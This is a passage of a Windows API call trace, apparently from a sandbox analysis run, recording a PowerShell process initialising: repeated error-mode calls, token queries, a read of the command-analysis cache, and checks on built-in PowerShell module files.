lpOldMode=0x653ef8ddb0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.902] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d8360 [0224.902] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b739d8360, nSize=0x105 | out: lpBuffer="") returned 0x0 [0224.902] CoTaskMemFree (pv=0x25b739d8360) [0224.904] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d98a0 [0224.904] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b739d98a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0224.905] CoTaskMemFree (pv=0x25b739d98a0) [0224.905] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8da90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0224.905] GetCurrentProcess () returned 0xffffffffffffffff [0224.905] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8df48 | out: TokenHandle=0x653ef8df48*=0x7ec) returned 1 [0224.905] GetTokenInformation (in: TokenHandle=0x7ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8e048 | out: TokenInformation=0x0, ReturnLength=0x653ef8e048) returned 0 [0224.905] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739d2dd0 [0224.905] GetTokenInformation (in: TokenHandle=0x7ec, TokenInformationClass=0x1, TokenInformation=0x25b739d2dd0, TokenInformationLength=0x2c, ReturnLength=0x653ef8e048 | out: TokenInformation=0x25b739d2dd0, ReturnLength=0x653ef8e048) returned 1 [0224.906] LocalFree (hMem=0x25b739d2dd0) returned 0x0 [0224.907] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c07d740, cbSid=0x653ef8e040 | out: pSid=0x25b5c07d740*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8e040) returned 1 [0224.908] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8dee0*=0x6f4, lpdwindex=0x653ef8dcb4 | out: lpdwindex=0x653ef8dcb4) returned 0x0 [0225.029] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8da10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0225.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de60) returned 1 [0225.029] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df40 | out: lpFileInformation=0x653ef8df40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0225.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de20) returned 1 [0225.154] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0225.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dda0) returned 1 [0225.154] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7dc [0225.154] GetFileType (hFile=0x7dc) returned 0x1 [0225.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd10) returned 1 [0225.154] GetFileType (hFile=0x7dc) returned 0x1 [0225.315] GetCurrentProcess () returned 0xffffffffffffffff [0225.315] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8c6b8 | out: TokenHandle=0x653ef8c6b8*=0x7e0) returned 1 [0225.347] GetCurrentProcess () returned 0xffffffffffffffff [0225.347] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8c6c8 | out: TokenHandle=0x653ef8c6c8*=0x7c4) returned 1 [0225.421] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c088a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dc08, lpOverlapped=0x0 | out: lpBuffer=0x25b5c088a08*, lpNumberOfBytesRead=0x653ef8dc08*=0x1000, lpOverlapped=0x0) returned 1 [0225.443] EtwEventRegister () returned 0x0 [0225.487] GetCurrentProcess () returned 0xffffffffffffffff [0225.487] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d568 | out: TokenHandle=0x653ef8d568*=0x7d8) returned 1 [0225.490] GetCurrentProcess () returned 0xffffffffffffffff [0225.490] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d578 | out: TokenHandle=0x653ef8d578*=0x7e4) returned 1 [0226.252] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c0d06fa, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8d8a8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d06fa*, lpNumberOfBytesRead=0x653ef8d8a8*=0x1f, lpOverlapped=0x0) returned 1 [0226.252] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c088a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d878, lpOverlapped=0x0 | out: lpBuffer=0x25b5c088a08*, lpNumberOfBytesRead=0x653ef8d878*=0x1000, lpOverlapped=0x0) returned 1 [0226.255] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c0d06fc, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef8d728, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d06fc*, lpNumberOfBytesRead=0x653ef8d728*=0x27, lpOverlapped=0x0) returned 1 [0226.255] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c088a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d7c8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c088a08*, lpNumberOfBytesRead=0x653ef8d7c8*=0x1000, lpOverlapped=0x0) returned 1 [0226.255] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c0d06c8, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8d688, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d06c8*, lpNumberOfBytesRead=0x653ef8d688*=0x5, lpOverlapped=0x0) returned 1 [0226.256] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c088a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d728, lpOverlapped=0x0 | out: lpBuffer=0x25b5c088a08*, lpNumberOfBytesRead=0x653ef8d728*=0x1000, lpOverlapped=0x0) returned 1 [0226.256] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c0d069a, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8d838, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0d069a*, lpNumberOfBytesRead=0x653ef8d838*=0x1d, lpOverlapped=0x0) returned 1 [0226.256] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c088a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d8d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c088a08*, lpNumberOfBytesRead=0x653ef8d8d8*=0xc85, lpOverlapped=0x0) returned 1 [0226.266] ReadFile (in: hFile=0x7dc, lpBuffer=0x25b5c088a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dbd8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c088a08*, lpNumberOfBytesRead=0x653ef8dbd8*=0x0, lpOverlapped=0x0) returned 1 [0226.267] CloseHandle (hObject=0x7dc) returned 1 [0226.268] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d9680 [0226.268] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoloadingCacheMaintenance", lpBuffer=0x25b739d9680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0226.268] CoTaskMemFree (pv=0x25b739d9680) [0226.271] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d8be0 [0226.271] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b739d8be0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0226.271] CoTaskMemFree (pv=0x25b739d8be0) [0226.271] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0226.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0226.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.272] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0226.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0226.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.273] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0226.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0226.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.273] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1 [0226.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", lpFilePart=0x0) returned 0x7c [0226.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.273] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c)) returned 1 [0226.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77 [0226.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.274] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8)) returned 1 [0226.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0226.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.274] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0226.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0226.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0226.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0226.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4)) returned 1 [0226.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0226.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, 